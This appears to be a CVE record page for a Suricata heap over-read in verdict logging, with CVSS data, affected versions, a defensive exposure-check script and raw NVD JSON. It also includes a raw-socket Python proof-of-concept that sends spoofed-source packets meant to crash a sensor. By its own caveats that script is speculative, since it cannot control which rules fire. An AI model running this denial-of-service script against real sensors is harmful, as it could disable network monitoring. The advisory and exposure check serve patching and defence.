Security Vulnerability Report

CVE-2025-64330

Published: 2025-11-26 23:15:48
Last Modified: 2025-12-05 13:31:00

Description

Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a single-byte heap buffer over-read when logging the verdict in eve.alert and eve.drop records can lead to crashes. Triggering it requires the per-packet alert queue to be filled with alerts and the same packet then to be matched by a pass rule. This issue has been patched in versions 7.0.13 and 8.0.2. To reduce the likelihood of this issue occurring, the alert queue size (packet-alert-max in suricata.yaml) should be increased if verdict logging is enabled; only sensors with verdict logging enabled reach the affected code.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (all versions before 7.0.13)
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (versions 8.0.0 up to, but excluding, 8.0.2)
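An added example (not code from this page, the NVD record or the Suricata project) that turns the affected ranges above and the mitigation from the description into a fleet check: it maps a sensor's version string to the two affected ranges, reads the effective packet-alert-max out of a suricata.yaml fragment, and reports whether the sensor is patched, affected but unreachable (verdict logging off), or exposed. The version ranges and the packet-alert-max key come from this record and the default of 15 is Suricata's shipped default; the `verdict: yes` key under the eve alert/drop output types is assumed here as the switch the description calls "verdict enabled" (confirm the exact key against your version's suricata.yaml), and the 64 used as a target queue size is a hypothetical stopgap value, not one the advisory gives. The version string and YAML fragment are constructed samples.

```python
import re

# Affected ranges from the NVD configuration nodes: every release before 7.0.13,
# and 8.0.0 up to (but excluding) 8.0.2.
FIXED_7 = (7, 0, 13)
FIRST_8 = (8, 0, 0)
FIXED_8 = (8, 0, 2)

DEFAULT_PACKET_ALERT_MAX = 15  # Suricata's shipped default for packet-alert-max

VERSION_RE = re.compile(r'(\d+)\.(\d+)\.(\d+)')
# Only an active (uncommented) top-level key counts; '# packet-alert-max: 15' does not match.
PACKET_ALERT_MAX_RE = re.compile(r'^\s*packet-alert-max:\s*(\d+)', re.MULTILINE)
# ASSUMPTION: verdict logging is switched on with a 'verdict: yes' line under the
# eve alert/drop output types. Adjust if your suricata.yaml names it differently.
VERDICT_RE = re.compile(r'^\s*verdict:\s*(yes|true)\b', re.MULTILINE | re.IGNORECASE)


def parse_version(text):
    """Return (major, minor, patch) from a bare version or `suricata -V` output."""
    m = VERSION_RE.search(text)
    if m is None:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected(version):
    """True if the version falls inside either affected range."""
    return version < FIXED_7 or FIRST_8 <= version < FIXED_8


def packet_alert_max(yaml_text):
    """Effective per-packet alert queue size; commented-out lines are ignored."""
    m = PACKET_ALERT_MAX_RE.search(yaml_text)
    return int(m.group(1)) if m else DEFAULT_PACKET_ALERT_MAX


def verdict_logging_enabled(yaml_text):
    """True if an active (assumed) 'verdict: yes' line is present in the config."""
    return VERDICT_RE.search(yaml_text) is not None


def assess(version_text, yaml_text, desired_queue=64):
    """Combine version and config into one status plus the actions to take.

    desired_queue is a hypothetical stopgap target for packet-alert-max; the
    advisory only says to raise the value, not by how much.
    """
    version = parse_version(version_text)
    affected = is_affected(version)
    verdict = verdict_logging_enabled(yaml_text)
    queue = packet_alert_max(yaml_text)
    if not affected:
        status = "patched"
    elif not verdict:
        status = "affected-unreachable"   # vulnerable code present, verdict logging off
    else:
        status = "exposed"
    actions = []
    if affected:
        actions.append("upgrade to 7.0.13 / 8.0.2 or later")
    if status == "exposed" and queue < desired_queue:
        actions.append(f"raise packet-alert-max from {queue} to at least {desired_queue} as a stopgap")
    return {"version": version, "affected": affected, "verdict_logging": verdict,
            "packet_alert_max": queue, "status": status, "actions": actions}


# Constructed sample inputs (not captured from a real sensor).
SAMPLE_VERSION = "This is Suricata version 7.0.12 RELEASE"
SAMPLE_YAML = """\
outputs:
  - eve-log:
      enabled: yes
      types:
        - alert:
            payload: yes
            verdict: yes
        - drop:
            alerts: yes
# packet-alert-max: 15   (commented out, so the default applies)
"""

if __name__ == "__main__":
    for key, value in assess(SAMPLE_VERSION, SAMPLE_YAML).items():
        print(f"{key}: {value}")
```

Run it against `suricata -V` output and the sensor's live suricata.yaml; a sensor that reports "exposed" should be upgraded first and have packet-alert-max raised only as an interim measure, since a larger queue lowers the likelihood of the condition rather than removing the bug.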

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-64330 PoC - Suricata heap overflow in verdict logging

This script only demonstrates the concept: it sends packets at a Suricata
sensor in the hope that the sensor's own ruleset raises enough alerts on one
packet to fill the per-packet alert queue and then matches a pass rule.

Caveats a practitioner should keep in mind:
  * The alert queue is per packet (packet-alert-max, default 15). It is not
    filled cumulatively by a flood of packets: a single packet must match more
    than packet-alert-max alert signatures and then a pass rule. Whether that
    happens depends entirely on the rules loaded on the sensor, which this
    script cannot control.
  * The bug is only reachable when verdict logging is enabled for eve.alert /
    eve.drop records, on Suricata before 7.0.13 or 8.0.0 to 8.0.1.
  * Raw sockets require root (CAP_NET_RAW). Use only against sensors you are
    authorised to test.
"""
import socket
import struct
import time

SRC_IP = '192.168.1.100'   # spoofed source address written into the IP header
SRC_PORT = 80


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b'\x00'
    total = sum(struct.unpack('!%dH' % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def create_malicious_packet(dst_ip, dst_port, seq, flags, payload):
    """Build a raw IPv4/TCP packet (headers + payload) with valid checksums.

    A zero TCP checksum (as in the original sketch) is invalid and may lead the
    sensor's stream engine to discard the packet before detection sees it.
    """
    src = socket.inet_aton(SRC_IP)
    dst = socket.inet_aton(dst_ip)
    total_len = 20 + 20 + len(payload)   # IP header + TCP header + data

    ip_header = struct.pack('!BBHHHBBH4s4s',
        0x45,        # Version 4, IHL 5
        0x00,        # TOS
        total_len,   # Total length
        12345,       # Identification
        0x4000,      # Flags (DF) + fragment offset
        64,          # TTL
        6,           # Protocol (TCP)
        0,           # Header checksum (filled in below)
        src, dst)
    ip_header = ip_header[:10] + struct.pack('!H', checksum(ip_header)) + ip_header[12:]

    tcp_header = struct.pack('!HHLLBBHHH',
        SRC_PORT, dst_port,
        seq, 0,      # Seq / Ack
        0x50,        # Data offset: 5 words, no options
        flags,
        65535,       # Window
        0,           # Checksum (filled in below over the pseudo-header)
        0)           # Urgent pointer
    pseudo = struct.pack('!4s4sBBH', src, dst, 0, 6, 20 + len(payload))
    tcp_csum = checksum(pseudo + tcp_header + payload)
    tcp_header = tcp_header[:16] + struct.pack('!H', tcp_csum) + tcp_header[18:]

    return ip_header + tcp_header + payload


def open_raw_socket():
    """IPPROTO_RAW: we supply the full IP header; the kernel does not add one."""
    return socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)


def send_flood_of_alerts(target_ip, port, count=100):
    """Send a series of packets intended to trip alert signatures on the sensor."""
    sock = open_raw_socket()
    print(f"[*] Sending {count} packets to trigger alerts...")
    for i in range(count):
        payload = b'X' * 100                                   # filler payload for detection
        packet = create_malicious_packet(target_ip, port, i, 0x02, payload)   # SYN
        sock.sendto(packet, (target_ip, 0))                    # port is ignored for raw sockets
        time.sleep(0.01)
    sock.close()
    print("[+] Alert packets sent")


def send_pass_trigger(target_ip, port):
    """Send a packet meant to match alert rules and then a pass rule.

    On a vulnerable sensor, a packet whose alerts fill the queue and which is
    then matched by a pass rule triggers the one-byte out-of-bounds read.
    """
    sock = open_raw_socket()
    print("[*] Sending pass rule trigger packet...")
    payload = b'SPECIAL_TRIGGER_PAYLOAD' * 10
    packet = create_malicious_packet(target_ip, port, 999999, 0x18, payload)   # PSH, ACK
    sock.sendto(packet, (target_ip, 0))
    sock.close()
    print("[+] Pass rule packet sent - may trigger a crash if the sensor is vulnerable")


if __name__ == "__main__":
    target = "192.168.1.1"   # Suricata sensor, or a host the sensor inspects traffic for
    port = 8080
    print("[*] CVE-2025-64330 Suricata heap overflow PoC")
    print("[*] Target: Suricata IDS/IPS")
    print("[*] Requirement: Suricata with verdict logging enabled in eve.alert/eve.drop")
    # Step 1: packets intended to raise alerts
    send_flood_of_alerts(target, port, count=100)
    # Step 2: packet intended to match a pass rule after the alert queue is full
    send_pass_trigger(target, port)
    print("[*] Attack sequence complete")
    print("[!] Check Suricata logs for a crash or restart")

References

https://github.com/OISF/suricata/commit/482e5eac9218d007adbe2410d6c00173368ce947 (Patch)
https://github.com/OISF/suricata/security/advisories/GHSA-83v7-gm34-f437 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64330", "sourceIdentifier": "[email protected]", "published": "2025-11-26T23:15:48.093", "lastModified": "2025-12-05T13:30:59.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine developed by the OISF (Open Information Security Foundation) and the Suricata community. Prior to versions 7.0.13 and 8.0.2, a single byte read heap overflow when logging the verdict in eve.alert and eve.drop records can lead to crashes. This requires the per packet alert queue to be filled with alerts and then followed by a pass rule. This issue has been patched in versions 7.0.13 and 8.0.2. To reduce the likelihood of this issue occurring, the alert queue size a should be increased (packet-alert-max in suricata.yaml) if verdict is enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.13", "matchCriteriaId": "AA4D86E3-44A3-4B0B-9CF4-9FC88091D3C1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.2", "matchCriteriaId": "C93A731C-19AD-4067-B28C-17164C2D981D"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/482e5eac9218d007adbe2410d6c00173368ce947", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-83v7-gm34-f437", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}